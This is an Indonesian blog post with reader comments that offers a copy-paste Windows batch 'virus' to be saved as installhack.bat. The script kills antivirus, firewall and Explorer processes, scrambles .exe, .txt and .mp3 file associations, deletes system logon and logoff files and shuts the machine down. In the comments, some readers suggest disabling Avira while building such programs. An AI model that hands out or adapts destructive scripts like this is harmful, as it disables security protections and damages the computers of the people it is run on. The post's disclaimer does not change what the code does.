Searching...
Thursday, 12 May 2011

Cara Sederhana Membuat Virus Komputer Sendiri

20:21

Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi..

Mudah cara untuk membuat kode Virus

Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Hanya Copy kode di bawah ini lalu paste Pada Notepad:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Simpan di C: dengan nama installhack.bat
Selesai

semoga bermanfaat







Share
Read More Intresting Article`s:
Share This Article :

26 comments:

  1. good info... thx mas bro

    ReplyDelete
  2. wah bagus nie... isa tukeran link klik jauhari.net ya....

    ReplyDelete
  3. q bantu sundul nie...

    sundul

    sundull

    thx infona

    ReplyDelete
  4. ga isa gan..

    itu harus pake pascall ato gimana gan???

    ReplyDelete
  5. ga perlu gan...

    pake note pad aja gan..

    ato pake visual basic juga bisa...

    saya ada kode c##

    mw ga gan...


    ntar saya kasih link nya

    ReplyDelete
  6. maaf gan...

    tapi kode

    c## masih belum bisa pake vb lama gan gimana nie? apa kalo note pad bisa gan?

    ReplyDelete
  7. kalo pake note pad ga pake bahasa c# bang

    search aja di google ato pake rumus di atas juga isa gan

    tpi btw jangan pake virus trojan gan. kalo g ada aniti vir yabg handal. bisa senjta makan tuan.

    mdg pake avira aja gan

    ReplyDelete
  8. avira ya gan?

    kalo pake kaspersky giman gan?

    kan itu juga handal ngmg2 kalo virus yang bisa ngrusak hadware itu jenis apa?

    ReplyDelete
  9. oh kalo itu pake spec virus yang restart otomatis aja gan...

    kan isa ngrusak hd, n ram gan...
    lama lama kena ke mb gan.

    @ upil : nice info bang.

    ReplyDelete
  10. pake kis juga isa ko gan.

    itu mah selera orang aja.
    woy jangan buat virus ke pc gwa ea.
    heheheheh salam kenal agan agan semua

    ReplyDelete
  11. sungguh terlalu.
    berdiri di atas penderitaan orang lain adalah perbuatan tercela.

    sebaiknya jagan dicoba untuk merugikan orang lain. jadikan sebagai ilmu yang bermanfaat saja

    ReplyDelete
  12. betul apa agan di atas.
    berdiri di atas kesedihan merupakan cara yang slah.

    jangan di gunakan untuk merusak atau merugikan orang lain karna itu dosa gan.

    ingat dosa.
    wkwkwkwkwkwkwkwkw

    ReplyDelete
  13. wah jangan ngmgin dosa donk.

    emang elu pikir elu kagak punya dosa?

    qt kan untuk mendapatkan ilmu jangan takut akan resikonya

    ReplyDelete
  14. wah ada orang bar bar nie gan.

    qt kan umat beragama jadi qita harus mengurangi dosa agar tdk terprusuk ke jalan yg slah gan.

    ReplyDelete
  15. ko bar bar sich gan tapi kafir..

    masak org kagak takut dosa

    ReplyDelete
  16. saya tidakk takut dosa tapi saya takut sama allah gan..

    kalo dosa kita mah udah sering melakukan nya.. iya ga??

    ngmg2 kalo ngmg dipikir dong jangan asal bacot

    ReplyDelete
  17. sudah sudah jangan berkelahi...

    n untuk mas upil nice info n thx ea..

    kalo ada rumus baru tlg di posting donx

    salam new bie

    ReplyDelete
  18. woy, orang kafir.

    memang bener qt harus takut sama allah tapi ganjaran jika qt melakukan perbuatan tercela itu dosa.

    bukan maksud gwa ngajakin berantem.

    tapi elu nya aja yang nganggep begitu.

    ReplyDelete
  19. sudah sudah jangan berantem.
    mari qt slsaikan mslh dgn kepala dgin.

    @ upil : info bagus *_*

    @ anonim yag pake avira.
    gan ko avira saya mendetect vb sbg virus ya?

    ReplyDelete
  20. m5g byk jg antivir yg mencurigai vb sbg virus tapi itu trgntung dri sumber file nya vb. ada yg dari 4sahred itu juga terdect sbg virus.

    tapi g cuman 4shared doank banyak ko.

    kalo mw aman ambil aja di hot file.

    q waktu ngmabil dari hot file aman dari avira gan

    ReplyDelete
  21. mending aviranya di disable dulu aja gan.

    bru kalo udah jadi productnya di enabled..

    heheheh thx infona gan

    ReplyDelete
  22. @ remo bener juga tu sarannya..

    daripada download lagi 2X kerja.
    heheheh thx infona

    ReplyDelete
  23. gan ko avira saya ndetect virus terus.

    terus laptop jadi hang.
    knapa tu gan?

    plizz ptg

    ReplyDelete
  24. wah kalo itu tandanya aviranya mas seno udah ke infeksi virus.

    mas.
    cara mengatasi avira supaya tidak mendeteksi virus terus menerus adalah dengan cara instal ulang.

    kalo mw aman di format hard disk sekalian aja
    biar tuntas

    ReplyDelete
  25. nice info agan agan semua

    salam new bie aq bantu sundul mas upil

    ReplyDelete
  26. saya mahasiswa dari Jurusan Informatika
    Artikel yang sangat menarik, bisa buat referensi ini ..
    terimakasih ya infonya :)

    ReplyDelete

Terima kasih kunjungan agan.
Blog ini adalah dofollow blog jadi dengan berkomentar saja maka agan akan mendapatkan backink gratis dari blog saya.

Silahkan berkomentar...

Tapi ingat tata cara berkomentar.
1. Gunakan kata kata yang sopan,
2. Jangan merusak nama baik orang lain
3. Dalam pengcopyan artikel jika berkenan silakan tampilkan link sumber.

semoga bermanfaat.